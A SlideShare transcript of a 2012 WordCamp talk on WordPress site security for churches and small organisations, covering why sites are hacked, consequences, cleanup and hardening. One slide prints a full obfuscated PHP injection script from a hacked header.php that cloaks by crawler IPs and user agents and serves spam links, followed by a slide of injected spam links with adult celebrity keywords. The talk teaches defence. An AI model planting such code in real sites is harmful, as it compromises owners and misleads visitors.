• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Google says you shouldn’t visit my church wcgr
 

Google says you shouldn’t visit my church wcgr

on

  • 3,290 views

Justin Jones speaking about WordPress website security at WordCamp Grand Rapids, August 18, 2012

Justin Jones speaking about WordPress website security at WordCamp Grand Rapids, August 18, 2012

Statistics

Views

Total Views
3,290
Views on SlideShare
2,872
Embed Views
418

Actions

Likes
0
Downloads
3
Comments
0

4 Embeds 418

http://justinjones.net 414
http://www.linkedin.com 2
http://webcache.googleusercontent.com 1
http://72.30.186.176 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Google says you shouldn’t visit my church wcgr Google says you shouldn’t visit my church wcgr Presentation Transcript

    • Justin Jones • Fort Wayne, IN @jjonesftw
    • I’m Justin Jones0 Teacher0 Church Worker0 WordPress hobbyist0 Podcast cohost at “The Weekly Theme Show” http://wpcandy.com0 @jjonesftw0 justinjones.net
    • Why would someone want to hack my site?0 The world doesn’t revolve around you 0 Crime of opportunity 0 Don’t leave your front door unlocked
    • Why would someone want to hack my site?0 Imperva selected 50 sites at random, July 2012: 0 Expect attack incidents 120 days per year (33%) of the time, some can experienced 292 days (80%) 0 Attacked 274 times per year 0 Attack campaigns averages 7 minutes 42 seconds, can range upward from there 0 SQL Injection is the most frequent attack
    • Why would someone want to hack my site?0 “Black Hat” SEO 0 Hidden links, footer credit links, back links, etc…0 To make money directly 0 Affiliate sales 0 Rogue virus scanners
    • Why would someone want to hack my site?0 Serve up images and content for SPAM email
    • Why would someone want to hack my site?
    • What do they do while they’re poking around my site?0 Alter robots.txt, .htaccess 0 Some are specific to “robots” or HTTP Referrer0 Create backdoors in unsuspecting .php files0 Add their own .php files and images to serve up their payload content
    • What do they do while they’re poking around my site?0 Inject code into theme files, like header.php<?//1234$GLOBALS[_2008634924_]=Array(error_re .porting,function_e .xi .st .s,fop .e .n,fwrite, .f.clos .e, .s .trstr,strtolower,ex .p .lode,ip2long,i .p2l .ong,l .ong2ip,ip2long,.fi .le_exists,pre .g_mat .ch,file_ge .t_contents,pr .eg_match,f .i .le ._get ._c .ont.ent .s,u .nseriali .ze,count,range,a .rra .y_splice,array_ .values,preg ._matc .h,file._get_ .contents,un .ser .ial .iz .e,gzuncompress,base .64_deco .de, .str .len); function_1572011439($i){$afa=Array(Ym90a28=,ZmlsZV9wd .XRf .Y2 .9ud .GV .udHM=,dw==,Z29v .Z .2 .xl,c2x.1cnA=, .bXN .uY .m .90,Yml .u .Z2JvdA==,Ym90,Y .3 .Jhd2 .w .=, .c3BpZGV .y,cm9.ib3Q=, .SH .R0cENsaWVudA= .=, .Y3 .V .y .b .A .==, .c2 .Nvb3Rlcg==,d3d3c3 .Rlcg==,.UHl0aG9 .u, .dX .J .sb .Gli,cG .Vyb .A= .=,bGlid3d3,b .HlueA==,VkIgUHJva .mVjd .A=.=,U .Hl0aG .9uLXVybGxpYi8yL .j .Y=,TW9 .6a .Wx .sYS .82N .jYuKD .Y .p,TW9 .6 .aWxs.YS80L .jAgK .GNvbXB .hdGli .b .G .U7IE1 .TS .UUgNi4w .OyBXa .W5kb3dzIE5UIDUuMS .k=,T.W96aWx .sYS .8 .0LjA .g .KGNv .bX .Bh .dGl .i .bGU .7KQ==, .TW96aWxsYS80 .LjAgK .GNvbXB.hdGlibG .U7IE1TSUUgNS4w .MDsg .V .2luZG .93cyA5OCk=, .TW .96 .aWxsYS8 .0LjAgKG .NvbXBhdGlibG.U7I .E .1 .TSUUg .N .i4wO .yBX .aW5 .kb3dzIE5UIDUuMTsg .U1YxK .Q .==, .TW96 .aWxs .YS80.LjAg .KGNvb .X .Bh .dGlibGU7IE .1TSUUgN .i4wOyBXaW5kb3dzIE5UIDU .uMTsgLk5FV .C .BDTF .IgM .S4wL.jM .p,Lw==,Lm .N .vcmU .=,fDxpc .D4oLiopPC9pc .D58VWl .z,LmNvcmU=, .fDx .p .cD4.oLiopPC9pc .D58V .W .lz,bGlj .ZW .5zZ .S50eH .Q=,U .kVNT1RF .X0 .FERFI=,SF .R .U.UF9VU0 .VSX0FH .RU .5U,Ym90 .a2 .8=,fDx .pbnQ+KC4q .K .T .wv .aW50Pnx .VaX.M=,bGljZW5zZS50 .eHQ=, .UkVR .VUV .TVF9VUkk=, .PGJ .yPg .==);return base64_decode($afa[$i]);}if(isset($_GET[_1572011439(0)])){}else{$GLOBALS[_2008634924_][0](0);}if(!$GLOBALS[_2008634924_][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS[_2008634924_][2]($_0,_1572011439(2));if(!$_2){returnfalse;}else{$_3=$GLOBALS[_2008634924_][3]($_2,$_1);$GLOBALS[_2008634924_][4]($_2);return $_3;}}}functionl__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS[_2008634924_][5]($GLOBALS[_2008634924_][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS[_2008634924_][7](_1572011439(28),$_8);$_11=$GLOBALS[_2008634924_][8]($_10[0]);$_12=$GLOBALS[_2008634924_][9]($_10[1]);$_13=$GLOBALS[_2008634924_][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS[_2008634924_][11]($_9);return($_14&$_13)==($_11&$_13);}functionl__3($REMOTE_ADDR){if($GLOBALS[_2008634924_][12](_1572011439(29))){$GLOBALS[_2008634924_][13](_1572011439(30),$GLOBALS[_2008634924_][14](_1572011439(31)),$_15);}else{$GLOBALS[_2008634924_][15](_1572011439(32),$GLOBALS[_2008634924_][16](_1572011439(33)),$_15);}$_16=$GLOBALS[_2008634924_][17]($_15[1]);foreach($_16 as$_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return(int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS[_2008634924_][18]($_20);if($_23<$_18){returnfalse;}$_24=$GLOBALS[_2008634924_][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS[_2008634924_][20]($_24,$_26,1);$_24=$GLOBALS[_2008634924_][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 orisset($_GET[_1572011439(36)])or $_28){$GLOBALS[_2008634924_][22](_1572011439(37),$GLOBALS[_2008634924_][23](_1572011439(38)),$_29);$_30=$GLOBALS[_2008634924_][24]($GLOBALS[_2008634924_][25]($GLOBALS[_2008634924_][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS[_2008634924_][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);}//1234?>
    • What do they do while they’re poking around my site?0 Inject code into theme files, like header.php<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a><br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a><br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a><br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a><br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a><br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a><br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a><br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a><br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a><br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a><br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a><br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a><br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a><br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a><br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a><br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a><br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a><br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a><br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a><br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a><br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a><br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a><br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a><br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a><br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a><br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>
    • How Do They Get In?0 Outdated versions of WordPress0 Outdated themes and plugins0 Hosting providers behind the times0 Insecure password / brute force0 Compromised computer 0 Passwords cached in FTP clients, passwords stored in an unencrypted text file etc…0 Unsecure internet connection 0 Rogue access points 0 Packet sniffers on public WiFi
    • What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
    • What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
    • What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
    • What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
    • What are the consequences?0 Google will punish you. 0 Google Safe Browsing or manual removal action
    • What are the consequences?0 Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others0 Spammy content will get indexed with every search engine 0 Don’t forget about directory listing sites, like Google Places / Google Maps0 Your host may dump you for violating TOS
    • What are the consequences?0 Be a good neighbor! Security is everyone’s responsibility
    • What are the consequences?0 Malware cost the US economy 2.2 billion dollars in lost productivity in 20110 Are you an ecommerce site? 0 Payment gateway is probably offsite, but what about people’s email addresses?0 Membership site? 0 Many people re-use passwords 0 Linked In, Last.fm, many others recently0 Business or organization? 0 How much street cred will you earn serving content from exotic-dildos.co.cc
    • Is WordPress insecure?0 No.0 Pharma hack had a patch out before exploited0 WordPress has a target on its back 0 WordPress is used by over 14.7% of Alexa Internets "top 1 million" websites and as of August 2011 manages 22% of all new websites.0 Some theme and plugin authors are lazy/sloppy, or use depreciated/inefficient methods0 You are your own worst enemy! 0 Think about Windows XP back in like 2002
    • Is WordPress insecure?0 Be careful who you trust 0 Everyone is a “developer” now 0 NEVER download and install a theme for free that you should have paid for 0 Shady scraper sites, torrents, etc… 0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto
    • Is WordPress insecure?0 Be careful who you trust 0 Be very wary of downloading a free theme outside of the WordPress.org theme repo 0 Use “Theme Authenticity Checker” and “Theme Check” 0 Siobhan McKeown at WPMU.org Google’d “free wordpress themes” 0 Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using encrypted code to insert spammy links 0 Use trusted theme marketplaces or commercial shops
    • Is WordPress insecure?0 Be careful who you trust 0 Choose plugins carefully 0 Trusted commercial plugin shops 0 WordPress.org directory 0 More plugins != insecure 0 Check user ratings 0 Support forum requests 0 Check community blogs 0 WordPress.org profile pages for favorites and others by same author
    • Is WordPress insecure?
    • Is WordPress insecure?
    • Is WordPress insecure?
    • Is WordPress insecure?
    • Prepare for Disaster0 It’s going to happen0 Maintain regular backups 0 Server side or Plugins0 Be registered with Google Webmaster Tools0 Know how to contact your hosting provider0 Know a developer0 Visit your site0 Watch your stats
    • Update. Update. Update.0 Source: http://churchm.ag/wordpress-updates/
    • Update. Update. Update. 0 August 2011, so 3.2.1 was most current 0 Less than half of the top 100k sites running WordPress were up to date! 0 WordPress interates quickly to patch security holes. Keep updated to benefit from their work0 Source: http://churchm.ag/wordpress-updates/
    • Update. Update. Update.0 WordPress core, .org plugins and .org themes can use the core update functionality0 Some commercial theme and plugins have their own way of one click upgrade, some are manual only0 Some have notifications, some don’t0 Sign up for WordPress.org release notifications from download page
    • Here’s Where This Gets Technical0 I’ll have these slides up on Slide Share0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Take a deep breath and crack open a beer. You’ve got some work ahead of you. 0 Get back control of your site 0 Get the site offline if you can!
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Change *every* single one of your passwords 0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password 0 I suggest changing your email account passwords 0 Hire a professional 0 Check out http://sucuri.net/ 0 Many others out there, Google them up!
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Regenerate WordPress secret keys / salts 0 Manually in wp-config.php or use a plugin define(AUTH_KEY, n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP); define(SECURE_AUTH_KEY, q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/); define(LOGGED_IN_KEY, Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}); define(NONCE_KEY, B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns); define(AUTH_SALT, bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@); define(SECURE_AUTH_SALT, S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q); define(LOGGED_IN_SALT, ~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-); define(NONCE_SALT, KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[);
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Backup 0 Restore from a previous backup 0 Find and delete all the junk they added 0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc… 0 Posts and images now in database 0 Reinstall WordPress core, plugins and themes
    • It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What? 0 Begin the process of restoring your good name 0 Request delisting of bogus content from Google and other search engines 0 Very tedious, manual process 0 Request reevaluation from blacklisting services 0 Don’t forget about other services that pull content from your site, like Google places 0 Wait it out. This will take weeks and months 0 Prepare better for next time
    • Harden Your Site. The Easy Stuff.0 Keep up to date! WordPress, plugins, themes – but also PHP version on your host0 Use strong passwords – no words! Not P@$$woRd either. 0 Consider using a password manager0 Remove “admin” user
    • Harden Your Site. The Easy Stuff.0 Only connect using SFTP0 Never ever hack core WordPress files0 Keep a clean house! 0 Other WP installs, other PHP services, plugins, old themes0 Disable user registration
    • Harden Your Site.The More Complicated Stuff.0 Store your wp-config file outside of public_html 0 Done at install or can be moved later0 Change the database prefix0 Use strong database passwords0 Use proper 755 file permissions 0 If a plugin or theme asks you to set 777, avoid.0 Only log in to site using SSL (https://...)
    • Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins! 0 Monitor core / template files 0 “WordPress File Monitor Plus” 0 Scan template files for suspicious code 0 “AntiVirus” 0 WP and server security settings 0 “WebsiteDefender WordPress Security” 0 Keep up to date 0 “Update Notifications”
    • Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins! 0 “WordPress Firewall 2” 0 “Block Bad Queries” 0 Backup 0 VaultPress 0 BackupBuddy 0 Login Lockdown 0 Lock out excessive retries and mask login errors 0 Many others available for two factor auth, etc… 0 Sucuri plugin has a firewall to block known bad IP’s
    • Should you really be hosting your own site?0 Do you like to change your own oil in your car or take it to the Jiffy Lube?0 WordPress.com is a great resource for most personal bloggers. Focus on writing your content.0 Consider a WordPress managed host. 0 WP Engine, ZippyKid, Pagely, etc…0 Don’t be afraid to pay someone! 0 How important is this project? 0 What is your time worth?
    • Resources0 Codepoet.com 0 eBook “Locking Down WordPress”
    • Resources0 These slides on Slide Share0 Search for slides from Dre Armeda and Brad Williams0 WordPress.org Codex0 Otto on WordPress0 Sucuri.net – service and blog0 Lockdown WordPress – A Security Webinar with Dre Armeda 0 1.5 hour interview – great resource!0 Countless plugins on the WordPress.org repo0 http://sitecheck.sucuri.net/scanner/
    • Questions?0 No question is stupid. We’re all here to learn!0 If you’re smarter than I am, please jump in here.